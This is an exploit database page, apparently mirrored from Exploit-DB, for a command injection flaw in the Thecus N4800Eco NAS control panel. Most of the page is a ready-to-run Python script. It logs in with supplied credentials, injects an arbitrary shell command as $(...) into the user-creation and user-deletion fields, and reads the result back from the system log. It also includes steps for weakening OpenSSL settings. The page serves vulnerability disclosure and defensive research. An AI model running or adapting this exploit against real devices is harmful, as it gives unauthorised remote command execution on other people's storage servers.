Vulners
Lucene search
Thecus N4800Eco Nas Server Control Panel - Comand Injection
🗓️ 02 Jun 2021 00:00:00Reported by Metin Yunus KandemirType 
exploitdb🔗 www.exploit-db.com👁 161 Views
# Exploit Title: Thecus N4800Eco Nas Server Control Panel - Comand Injection
# Date: 01/06/2021
# Exploit Author: Metin Yunus Kandemir
# Vendor Homepage: http://www.thecus.com/
# Software Link: http://www.thecus.com/product.php?PROD_ID=83
# Version: N4800Eco
# Description: https://docs.unsafe-inline.com/0day/thecus-n4800eco-nas-server-control-panel-comand-injection
#!/usr/bin/python3
import requests
import sys
import urllib3
# To fix SSL error that occurs when the script is started.
# 1- Open /etc/ssl/openssl.cnf file
# At the bottom of the file:
# [system_default_sect]
# MinProtocol = TLSv1.2
# CipherString = DEFAULT@SECLEVEL=2
# 2- Set value of MinProtocol as TLSv1.0
def readResult(s, target):
d = {
"fun": "setlog",
"action": "query",
"params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
}
url = "http://" + target + "/adm/setmain.php"
resultReq = s.post(url, data=d, verify=False)
dict = resultReq.text.split()
print("[+] Reading system log...\n")
print(dict[5:8]) #change this range to read whole output of the command
def delUser(s, target, command):
d = {
"action": "delete",
"username": "$("+command+")"
}
url = "http://" + target + "/adm/setmain.php?fun=setlocaluser"
delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
if 'Local User remove succeeds' in delUserReq.text:
print('[+] %s command was executed successfully' % command)
else:
print('[-] %s command was not executed!' %command)
sys.exit(1)
readResult(s, target)
def addUser(s, target, command):
d = {'batch_content': '%24('+command+')%2C22222%2C9999'}
url = "http://" + target + "/adm/setmain.php?fun=setbatch"
addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)
if 'Users and groups were created successfully.' in addUserReq.text:
print('[+] Users and groups were created successfully')
else:
print('[-] Users and groups were not created')
sys.exit(1)
delUser(s, target, command)
def login(target, username, password, command=None):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
s = requests.Session()
d = {
"&eplang": "english",
"p_pass": password,
"p_user": username,
"username": username,
"pwd": password,
"action": "login",
"option": "com_extplorer"
}
url = "http://" + target + "/adm/login.php"
loginReq = s.post(url, data=d, allow_redirects=False, verify=False)
if '"success":true' in loginReq.text:
print('[+] Authentication successful')
elif '"success":false' in loginReq.text:
print('[-] Authentication failed!')
sys.exit(1)
else:
print('[-] Something went wrong!')
sys.exit(1)
addUser(s, target, command)
def main(args):
if len(args) != 5:
print("usage: %s targetIp:port username password command" % (args[0]))
print("Example 192.168.1.13:80 admin admin id")
sys.exit(1)
login(target=args[1], username=args[2], password=args[3], command=args[4])
if __name__ == "__main__":
main(args=sys.argv)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2021 00:00Current
7.4High risk
Vulners AI Score7.4